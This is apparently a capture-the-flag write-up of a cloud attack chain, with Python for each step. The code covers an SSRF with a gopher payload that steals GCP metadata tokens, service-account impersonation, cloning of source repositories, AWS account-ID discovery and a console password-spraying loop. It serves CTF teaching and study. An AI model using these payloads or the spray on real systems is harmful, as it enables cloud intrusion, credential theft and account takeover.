Infiltrate (open the gate)
When clicking the refresh button, we can see that the web app sends a POST request with a local URL as the feed. This is a classic SSRF vulnerability that we see in cloud CTFs.
We are also able to get local file read by changing the protocol to file://
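As a rough illustration, the whole primitive fits in a few lines (the endpoint path here is a placeholder; the feed parameter is the one the app actually uses):

```python
import requests

TARGET = "http://target.example/refresh"  # placeholder for the vulnerable endpoint

# The refresh feature fetches whatever URL we supply as "feed", so pointing it
# at an internal address gives SSRF, and file:// gives local file read.
for url in ("http://127.0.0.1/", "file:///etc/passwd"):
    resp = requests.post(TARGET, data={"feed": url})
    print(url, "->", resp.status_code)
    print(resp.text[:200])
```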
From the source code, we can see that there is blacklisting along with sanitization involved, so we are not able to get RCE. When attempting to query the instance metadata, I received an error message saying that the request is missing the Metadata-Flavor header.
However, while doing research, I came across this technique on PayloadsAllTheThings, which uses the gopher protocol to embed the required request header.
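The idea is that gopher:// delivers raw bytes to metadata.google.internal:80, so the forbidden header can simply be baked into the TCP stream. A minimal sketch of building such a payload (the ssh-keys path follows the standard GCP metadata layout and may differ per target):

```python
from urllib.parse import quote

# gopher:// lets us send a raw HTTP request to metadata.google.internal:80,
# embedding the Metadata-Flavor header that the SSRF alone cannot set.
raw_request = (
    "GET /computeMetadata/v1/project/attributes/ssh-keys HTTP/1.1\r\n"
    "Host: metadata.google.internal\r\n"
    "Metadata-Flavor: Google\r\n"
    "\r\n"
)
# The leading "_" is the gopher type selector consumed by the server.
payload = "gopher://metadata.google.internal:80/_" + quote(raw_request)
print(payload)  # feed this URL to the vulnerable "feed" parameter
```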
By copying the payload, we are able to list the SSH keys successfully as a proof of concept.
Next, I enumerated the metadata and retrieved the access token.
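The token lives at a well-known metadata path, so the same gopher wrapping applies:

```python
from urllib.parse import quote

# The default service account's OAuth2 access token is exposed at a standard
# metadata path; wrap the request in gopher exactly as before.
raw_request = (
    "GET /computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1\r\n"
    "Host: metadata.google.internal\r\n"
    "Metadata-Flavor: Google\r\n"
    "\r\n"
)
print("gopher://metadata.google.internal:80/_" + quote(raw_request))
```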
From here I was stuck for quite a while, trying to use the access token to enumerate the mp-compute2 service account's permissions. It was not until I DMed an admin for a hint that I was able to progress.
So apparently GCP Brute does not run testIamPermissions against a different service account, and we have to enumerate manually via the APIs.
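Manually, the check is one POST to the IAM API's testIamPermissions method on the target service account (project ID and service-account email below are placeholders):

```python
import requests

TOKEN = "<mp-compute2 access token>"  # from the metadata server
PROJECT = "<project-id>"              # placeholder
TARGET_SA = "cloud-source@<project-id>.iam.gserviceaccount.com"  # placeholder

# Ask the IAM API which of these permissions we hold on the target service
# account as a resource; only the ones we actually have are echoed back.
url = (f"https://iam.googleapis.com/v1/projects/{PROJECT}"
       f"/serviceAccounts/{TARGET_SA}:testIamPermissions")
body = {"permissions": [
    "iam.serviceAccounts.getAccessToken",
    "iam.serviceAccounts.actAs",
    "iam.serviceAccounts.signBlob",
]}
resp = requests.post(url, json=body,
                     headers={"Authorization": f"Bearer {TOKEN}"})
print(resp.json())
```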
The cloud-source service account comes from the enumeration we performed earlier.
Since mp-compute2 is able to get access tokens for cloud-source, let's mint one and enumerate the cloud-source service account's permissions.
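Minting the token is a single call to the IAM Credentials API's generateAccessToken method (the service-account email is again a placeholder):

```python
import requests

TOKEN = "<mp-compute2 access token>"
TARGET_SA = "cloud-source@<project-id>.iam.gserviceaccount.com"  # placeholder

# iam.serviceAccounts.getAccessToken lets us impersonate cloud-source and
# receive a short-lived token issued for that service account.
url = (f"https://iamcredentials.googleapis.com/v1/projects/-"
       f"/serviceAccounts/{TARGET_SA}:generateAccessToken")
body = {"scope": ["https://www.googleapis.com/auth/cloud-platform"]}
resp = requests.post(url, json=body,
                     headers={"Authorization": f"Bearer {TOKEN}"})
print(resp.json()["accessToken"])  # this token now acts as cloud-source
```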
With the new access token, let's enumerate the service account's permissions.
From the output, we can see that the service account has permissions over Cloud Source Repositories, which is essentially Google Cloud's version of GitHub.
So let's enumerate Cloud Source.
Enumerating the Cloud Source repos.
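Listing can be done with gcloud or straight against the Cloud Source Repositories API:

```python
import requests

TOKEN = "<cloud-source access token>"
PROJECT = "<project-id>"  # placeholder

# The repos.list method returns every repository in the project.
resp = requests.get(
    f"https://sourcerepo.googleapis.com/v1/projects/{PROJECT}/repos",
    headers={"Authorization": f"Bearer {TOKEN}"},
)
for repo in resp.json().get("repos", []):
    print(repo["name"], repo.get("url", ""))
```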
Cloning the repo.
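If gcloud is not configured, the clone can also be attempted with plain git, assuming CSR accepts a bearer token in the Authorization header the way other Google git endpoints do (project and repo names are placeholders):

```python
import subprocess

TOKEN = "<cloud-source access token>"
CLONE_URL = "https://source.developers.google.com/p/<project-id>/r/<repo>"

# git honours http.extraHeader, so the bearer token rides along with the clone.
subprocess.run([
    "git", "-c", f"http.extraHeader=Authorization: Bearer {TOKEN}",
    "clone", CLONE_URL,
], check=True)
```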
Looking at the code of the cloned repo, it seems to just be a static HTML site. The only interesting part is that there's a public S3 bucket referenced.
However, while enumerating the public bucket, all the files turned out to be standard libraries, with nothing interesting.
That's when I recalled a lab I had done before, which extracts the AWS Account ID from an S3 bucket and performs further enumeration with it.
I will not elaborate on the process of setting up the IAM user and policy; you can refer to the linked lab, or find a similar article within the references.
Here, I used s3-account-search to enumerate the Account ID, then used a curl request with the x-amz-expected-bucket-owner header to verify it.
If the Account ID is wrong, we get an Access Denied instead.
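The verification needs nothing beyond the header itself; a sketch against a public bucket (bucket name and candidate ID are placeholders):

```python
import requests

BUCKET_URL = "https://<bucket-name>.s3.amazonaws.com/"  # placeholder public bucket
candidate = "123456789012"  # Account ID recovered by s3-account-search

# S3 rejects the request with 403 Access Denied if the header does not match
# the bucket's real owner, confirming (or refuting) the recovered Account ID.
resp = requests.get(BUCKET_URL,
                    headers={"x-amz-expected-bucket-owner": candidate})
print(resp.status_code)  # 200 = correct owner, 403 = wrong Account ID
```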
Next, I'll be spraying with GoAWSConsoleSpray again, using the username and password wordlists we saved previously. I managed to find credentials for haru with a reused password.
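For reference, the spray boils down to repeated POSTs against the console sign-in endpoint; this sketch mirrors what such tools do under the hood, with field names taken from public write-ups of the endpoint rather than any official API, so treat them as assumptions (real sprays also have to contend with rate limiting and CAPTCHAs):

```python
import requests

ACCOUNT_ID = "123456789012"                    # recovered Account ID (placeholder)
users = open("users.txt").read().split()       # wordlists saved earlier
passwords = open("passwords.txt").read().split()

for user in users:
    for pw in passwords:
        resp = requests.post(
            "https://signin.aws.amazon.com/authenticate",
            data={
                "action": "iam-user-authentication",  # field names are assumptions
                "account": ACCOUNT_ID,
                "username": user,
                "password": pw,
                "client_id": "arn:aws:signin:::console/canvas",
                "redirect_uri": "https://console.aws.amazon.com/console/home",
            },
        )
        # Inspect the response state to spot a valid pair among the failures.
        print(user, pw, resp.status_code, resp.text[:80])
```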
Let's enumerate the recently visited services to see if there's anything interesting.
Looking at Lambda, it looks like we have access to the function haru_test.
Looking at the source code, we are able to retrieve the flag.
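With haru's access, get_function exposes a presigned URL to the deployment package, which contains the function source and the flag (the region here is an assumption):

```python
import boto3
import requests

# get_function returns metadata plus a short-lived presigned URL for the
# code bundle; downloading it gives us the function source.
client = boto3.client("lambda", region_name="us-east-1")  # region is a guess
resp = client.get_function(FunctionName="haru_test")
code_url = resp["Code"]["Location"]

open("haru_test.zip", "wb").write(requests.get(code_url).content)
print("saved haru_test.zip")
```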
Utilize parthaban's credentials on the web application to authenticate
Attack the web app with SSRF, using the gopher protocol to append the Metadata-Flavor header
Use testIamPermissions on getAccessToken against other service accounts to perform lateral movement
Lateral movement to the cloud-source service account
Enumerate Google Cloud Source and download the Repository
Utilize s3-account-search to retrieve AWS Account ID
Utilize GoAWSConsoleSpray to spray AWS Console with the newly retrieved Account ID
Retrieve the flag from AWS Lambda